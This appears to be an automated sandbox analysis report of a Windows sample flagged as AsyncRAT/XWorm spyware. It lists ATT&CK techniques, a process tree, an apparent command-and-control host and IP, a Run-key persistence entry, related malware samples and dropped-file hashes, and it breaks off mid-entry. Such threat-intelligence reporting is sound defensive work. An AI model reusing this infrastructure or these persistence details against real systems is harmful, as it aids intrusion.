Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 12 Command and Scripting Interpreter; 1 Native API; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 21 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 11 Process Injection; 11 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 231 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1639881 | Sample: test2.exe.bin.exe | Startdate: 16/03/2025 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: Dyno15-41078.portmap.host; settings-ssl.xboxlive.com.edgekey.net; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  Started: test2.exe.bin.exe 3; svchost.exe 1 1; Music.UI.exe 63 38; 2 other processes

test2.exe.bin.exe 3
  Dropped: C:\Users\user\AppData\Local\...\XClient.exe, PE32
  Signatures: Encrypted powershell cmdline option found
  Started: XClient.exe 1 4; powershell.exe 23

svchost.exe 1 1
  DNS/IP: 127.0.0.1 unknown unknown

Music.UI.exe 63 38
  DNS/IP: e87.dspb.akamaiedge.net 92.123.20.9, 443, 49710 AKAMAI-ASUS European Union

XClient.exe 1 4
  DNS/IP: Dyno15-41078.portmap.host 193.161.193.99, 41078, 49711, 49714 BITREE-ASRU Russian Federation
  Dropped: C:\Users\user\AppData\Local\Temp\test, PE32
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag

powershell.exe 23
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe; WmiPrvSE.exe

Source | Detection | Scanner | Label | Link
test2.exe.bin.exe | 69% | Virustotal | | Browse
test2.exe.bin.exe | 81% | ReversingLabs | Win32.Ransomware.Generic |
test2.exe.bin.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\test | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\XClient.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Temp\XClient.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
C:\Users\user\AppData\Local\Temp\test | 92% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
Dyno15-41078.portmap.host | 100% | Avira URL Cloud | malware |
http://ns.adobe.om/ | 100% | Avira URL Cloud | malware |
http://ns.aobe | 0% | Avira URL Cloud | safe |
http://ns.adoe.cf | 0% | Avira URL Cloud | safe |
https://settings-ssl.xboxlive.comPN | 0% | Avira URL Cloud | safe |
http://ns.adobeTy | 0% | Avira URL Cloud | safe |
http://ns.adob/ | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
e87.dspb.akamaiedge.net | 92.123.20.9 | true | false | | high
Dyno15-41078.portmap.host | 193.161.193.99 | true | true | | unknown
settings-ssl.xboxlive.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://settings-ssl.xboxlive.com/XBLWinClient/v10_music/configuration.xml | false | | high
Dyno15-41078.portmap.host | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.windows.net | Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://iptc.org/std1. | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.adobe.om/ | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.1270956390.000000000581C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1270956390.0000000005990000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://xsts.auth.xboxlive.com | Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://xsts.auth.xboxlive.com/0 | Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.ver) | svchost.exe, 00000007.00000002.2862185954.000002CC6B400000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2.C: | edb.log.7.dr | false | | high
https://settings-ssl.xboxlive.com/ | Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://musicart.xboxlive.com/9/5c6a4700-0000-0000-0000-000000000002/504/image.jpg | Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ns.aobe | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://login.windows.local/ | Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod.C: | edb.log.7.dr | false | | high
https://login.windows.local | Music.UI.exe, 00000004.00000002.3638925659.000002CCD953C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.windows.net/ | Music.UI.exe, 00000004.00000002.3634239371.000002CCD90F8000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV2 | edb.log.7.dr | false | | high
http://ns.adoe.cf | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.dr | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://musicimage.xboxlive.comtXBLWinClient/v10_music/configuration.xml | Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://ns.adob/ | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://settings-ssl.xboxlive.comPN | Music.UI.exe, 00000004.00000003.1477016183.000002CCD8C81000.00000004.00000020.00020000.00000000.sdmp, Music.UI.exe, 00000004.00000002.3633444451.000002CCD8C83000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.1270956390.0000000005186000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1281166707.000000000609D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://musicart.xboxlive.com/9/e74d4600-0000-0000-0000-000000000002/504/image.jpg | Music.UI.exe, 00000004.00000002.3633566909.000002CCD8CDC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1270956390.0000000005031000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000003.00000002.3620480168.0000000002411000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.adobeTy | Music.UI.exe, 00000004.00000002.3629721021.000002CCD821B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | svchost.exe, 00000007.00000003.1209310248.000002CC6B342000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
193.161.193.99 | Dyno15-41078.portmap.host | Russian Federation | 198134 | BITREE-ASRU | true
92.123.20.9 | e87.dspb.akamaiedge.net | European Union | 16625 | AKAMAI-ASUS | false
                                                                                  IP
                                                                                  127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1639881
Start date and time: 2025-03-16 13:05:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: test2.exe.bin.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@11/27@2/3
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 80
• Number of non-executed functions: 9
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10, 20.109.210.53
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Music.UI.exe, PID 7992 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7788 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
08:06:52 | API Interceptor | 44574x Sleep call for process: Music.UI.exe modified
08:06:52 | API Interceptor | 29x Sleep call for process: powershell.exe modified
08:06:56 | API Interceptor | 3x Sleep call for process: svchost.exe modified
08:06:57 | API Interceptor | 10496711x Sleep call for process: XClient.exe modified
08:07:11 | API Interceptor | 2x Sleep call for process: OpenWith.exe modified
12:07:01 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run test C:\Users\user\AppData\Local\Temp\test
12:07:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run test C:\Users\user\AppData\Local\Temp\test
Match: 193.161.193.99
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Yq5Gp2g2vB.exe | Get hash | malicious | RedLine | Browse | okmaq-24505.portmap.host:24505/
Match: e87.dspb.akamaiedge.net
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
FleshPowerV2.exe | Get hash | malicious | Babadeda | Browse | 95.101.148.7
FleshPowerV2.exe | Get hash | malicious | Babadeda | Browse | 23.219.148.9
Busy2.0.exe | Get hash | malicious | Babadeda | Browse | 23.219.148.9
http://def.ball-strike-up.shop/ | Get hash | malicious | Unknown | Browse | 23.35.228.10
NrFs9S2x5P.vbs | Get hash | malicious | MoDiRAT | Browse | 2.23.244.9
desaremix.exe | Get hash | malicious | KillMBR | Browse | 95.101.148.7
desaremix.exe | Get hash | malicious | KillMBR | Browse | 95.101.148.7
Gadomancy.exe | Get hash | malicious | Unknown | Browse | 23.219.148.9
Gadomancy.exe | Get hash | malicious | Unknown | Browse | 2.23.244.9
VM Audio and Transcription for you on Thu, February 27, 2025 ref_bnyiIW.eml | Get hash | malicious | Unknown | Browse | 23.209.212.9
Match: AKAMAI-ASUS
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
hgfs.arm5.elf | Get hash | malicious | Unknown | Browse | 104.86.148.15
Spoofer.exe | Get hash | malicious | LummaC Stealer | Browse | 92.122.104.90
nvtowadkthjawdr.exe | Get hash | malicious | LummaC Stealer | Browse | 104.73.234.102
LauncherV9.exe | Get hash | malicious | LummaC Stealer | Browse | 104.73.234.102
launcher.exe | Get hash | malicious | Unknown | Browse | 104.73.234.102
Setup.exe | Get hash | malicious | LummaC Stealer | Browse | 104.73.234.102
InstructionalPostings.exe | Get hash | malicious | Unknown | Browse | 23.192.247.89
InstructionalPostings.exe | Get hash | malicious | Unknown | Browse | 23.192.247.89
installer_ver12.22.exe | Get hash | malicious | LummaC Stealer | Browse | 23.192.247.89
work.js | Get hash | malicious | Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | Browse | 23.192.247.89

Match: BITREE-ASRU
Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
tttt.exe.bin.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
SolaraExecutor.exe.bin.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
dd.exe.bin.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
Output.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
XClient.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
XClient.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
chrome.bat | Get hash | malicious | XWorm | Browse | 193.161.193.99
1.exe.bin.exe | Get hash | malicious | XWorm | Browse | 193.161.193.99
BootstrapperNew.exe.bin.exe | Get hash | malicious | Quasar | Browse | 193.161.193.99
Steam.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 193.161.193.99
Match | Associated Sample Name / URL | Detection | Threat Name | Context
6271f898ce5be7dd52b0fc260d0662b3 | FleshPowerV2.exe | malicious | Babadeda | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | FleshPowerV2.exe | malicious | Babadeda | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | Busy2.0.exe | malicious | Babadeda | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | MSBuild.exe | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | Our Order.xls | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | Proof of Payment and Statement.xls | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | APC2_240708172813545null_847608629.xls | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | Proof of Payment and Statement.xls | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | Account statement Payment release.xls | malicious | Unknown | 92.123.20.9
6271f898ce5be7dd52b0fc260d0662b3 | DHL 733988905ZHH.xla.xlsx | malicious | Unknown | 92.123.20.9

No context

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.363788168458258
Encrypted: false
SSDEEP: 6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5: 0E72F896C84F1457C62C0E20338FAC0D
SHA-1: 9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256: 686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512: AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious: false
Reputation: moderate, very likely benign file

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3107706297796735
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrM:KooCEYhgYEL0In
MD5: 5BFC092ADE58B9FC0023CEC5CDC86E53
SHA-1: 1CD5EBF56E7931D6BCC62C7227F34D8EC10B5C67
SHA-256: F87FC6DA4A6856692946D7BA1D123B8A89D2DAA03512632985152FB2D3260781
SHA-512: 602195BCD63B804556094257BB391F19ACC05A4A3313435C15BFC16324F4AD7888608AA93B672B0DF7C97BE85E55C7E96A8BA23DE4B892B43A586FE1B45C65AA
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xb1407c14, page size 16384, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.42208322303007606
Encrypted: false
SSDEEP: 1536:XSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Xazag03A2UrzJDO
MD5: D679ACED66DD49C99B47A76C3CBD55D3
SHA-1: BD253B5C0DF4E85E09ADF97E89FFA869CDF6A075
SHA-256: DAA9C938D7B6351182F15E12109A8D4928617A62B6C969CF7B9F60EBE7BFB411
SHA-512: 939AE1C806F4D5ED93022808325BA9E60DE8ED13ECC0F4212771C6D8B6D821423C41CCEE39D9FDC95EDA32D11E8A346AB96FC69E63E6DEEFE43E626FD0842CE9
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07327801873499173
Encrypted: false
SSDEEP: 3:IgStUetYerV1mPgbPs1ux1nuKillOE/tlnl+/rTc:IgUzrVsooe1n/GpMP
MD5: 43E69DF7A902C672C301FFD50BF027D8
SHA-1: 48A38F6DCB80BD03E638ADD07DC11A0A2CA55261
SHA-256: 2C1695D53EF6F957DD537FA466CC3CDF600F64602CE8CFAFAAF41A0148A75D75
SHA-512: DEB70BEAFF9EC200B16F4AC48C5DC9A5CDE417A947AD4B09A191AAAE08330B70889B828D4D462B626B349EB644E1D5361A963A0764048B7689F572AF00ACB8FD
Malicious: false

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380192968514367
Encrypted: false
SSDEEP: 48:+WSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//Z+Uyus:+LHyIFKL3IZ2KRH9OugIs
MD5: 98778F626AC9E3DC7169E3F08354680E
SHA-1: 97269AC745F7763EBD98A290F5F7B94CBDE9B787
SHA-256: B87CDA0FEFD257DC12C41E03FA369FDAECDB02BB2E7A9168D07CB412B5415D25
SHA-512: E6CDCBC763CDDE078C9E30A6544B5B14A7709579FEBB272B93B26FFEA92AB2701DF1F61CC3377E9A486D97BDF404865AB9BFFB344DD74777BAB000D08772280F
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 2659
Entropy (8bit): 4.926959150875136
Encrypted: false
SSDEEP: 48:cK88z2Dxfo++T4Vu5Hj2oJ//QBfM9ifr9jf2dBfUyrAf0dPfUytCfN4wc/+:n88z2DxueBQipjQB8BWP8pc+
MD5: 69415BBB2113097CE28402C78AAB8A1D
SHA-1: 3CC52AA27D635F22434CFEAD93C27D3B5287BF2E
SHA-256: 95458051B4940AA84E142A19F4F775901CBFADC6BDEC409FC7C9DAC854FC8910
SHA-512: 03C62FF862F73046C45D6495D6E5E821ACBD228A230E6761DEE9E8A4E48F157CE3566E6E06FE8CACA73D4736B6AC78A4914855CDE4037574D8DBF86B2B2A0B54
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xfd891228, page size 8192, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 3670016
Entropy (8bit): 0.2380243134713775
Encrypted: false
SSDEEP: 1536:xdSh2B+KY8kWJnbcgTC0/k63bBu7fhWx7zQSh20KY8kCeyDFqf6zgTC0/k63bBu5:/6PL4DQ6rLoc
MD5: A0EC53E59D2E43437C69714A4C7BAFA4
SHA-1: B6033E65841761EB7FB61EC2626AC9DB2789E644
SHA-256: DD402F6DCDC93BEE7682893EACFD6DCB857540B7CB18B0C43D4C5C25B981AD20
SHA-512: 30DD70363DA79633BE9897475744C9DA6B865374B87DACF2F9CBB000DBA78A30BA19F0760986577EC1CAE84BA6E88C67C92027E523B1C9D88CEF45CDF4FA5AD0
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08203213403361016
Encrypted: false
SSDEEP: 3:2YmZ5Ymjll1lYjpzvEjK2R7l/lBoiyllQjii1l8ll8l9k/wos9aolk4k1:uvZl1iZviRJUjugyvgo9
MD5: 0BCE22344B98FF7BF1A4BDF4DDADFD45
SHA-1: A9B3A8A262EE2910E4B30611BD557C255CA64883
SHA-256: 8C706CC2326725A6C3420121E4BF49996F194641169E259EF749223B0F0B85EC
SHA-512: 55D3A3F227DECB8ED553D9DA64DBC4E1CC24B86FB141CA5FE9BE5F476791DAFA79AC58943CE6658666BD99C75059CDBAA7094F0D543DE32AE1E0373E7EEEE2E5
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.6191073368731885
Encrypted: false
SSDEEP: 24:0RlY+fUCx/8+fUCx/QeRlY+fUCx/8+fUCx/Q:GeiUCx0iUCxFeiUCx0iUCx
MD5: 866D4AE698A98DA4DF5F7444D5F6D08F
SHA-1: 9F82E997FCA4AE96483436750D304B44284FD206
SHA-256: CA502F746361BB10CB8DA2A6252F2596F722441E46B249534A109FE348578D16
SHA-512: 99C0C894B1645278B5867F6242EA6AACBFE69AF19D57C70E7C9EFCBAE70F7660B2FED05014CBAF52CF0DC8B63A1E8B7FE19B44624FA14200372E01CB4A62B357
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: data
Category: dropped
Size (bytes): 2097152
Entropy (8bit): 0.7397765410586085
Encrypted: false
SSDEEP: 1536:/ZV8R1dzEBmHlXDulLuE2a+ciy8zWY+r6JBiN6MAfO42j6Gs1548AZ5yeh0G32fl:/ZV8RLD7rO3bJhWO4NaaVb5
MD5: C4745D7ADDC86304DCF46526AF3EA4B9
SHA-1: A303DD1E067E61D921E30B84D535BA6D36A5E1AD
SHA-256: BE3EA01237BBCE16CB68A99AEF0C98714D54C4EB8EC2E7B5A3A3BE05783C297E
SHA-512: 2487AAA69ABBA387823086A9B9C1E4F9A5584941EC797080EE48A31403E058CDC18EB23300A18EF87EE74179EA01DE198B4854489FE4706AA105F41EB1E07C50
Malicious: false

Process: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
File Type: data
Category: dropped
Size (bytes): 2097152
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3::
MD5: B2D1236C286A3C0704224FE4105ECA49
SHA-1: 7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
SHA-256: 5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
SHA-512: 731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
Malicious: false
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                  SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                  SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                  SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):2097152
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:B2D1236C286A3C0704224FE4105ECA49
                                                                                  SHA1:7D76D48D64D7AC5411D714A4BB83F37E3E5B8DF6
                                                                                  SHA-256:5647F05EC18958947D32874EEB788FA396A05D0BAB7C1B71F112CEB7E9B31EEE
                                                                                  SHA-512:731859029215873FDAC1C9F2F8BD25A334ABF0F3A9E1B057CF2CACC2826D86B0C26A3FA920A936421401C0471F38857CB53BA905489EA46B185209FDFF65B3B6
                                                                                  Malicious:false
                                                                                  Process:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb06ef157, page size 8192, JustCreated, Windows version 0.0
                                                                                  Category:dropped
                                                                                  Size (bytes):262144
                                                                                  Entropy (8bit):0.14191673320223755
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:02gAhY+VxEyVjqaytqxUSYQHDmit8UPcim:rhY+VxEyVjqaytqxUSYQHDmit8UPcim
                                                                                  MD5:EE6950B79A4FF120BAD06B3ACBE938CC
                                                                                  SHA1:08B92BA14B426741AF8ED1EDF6B10D0D918F7DF4
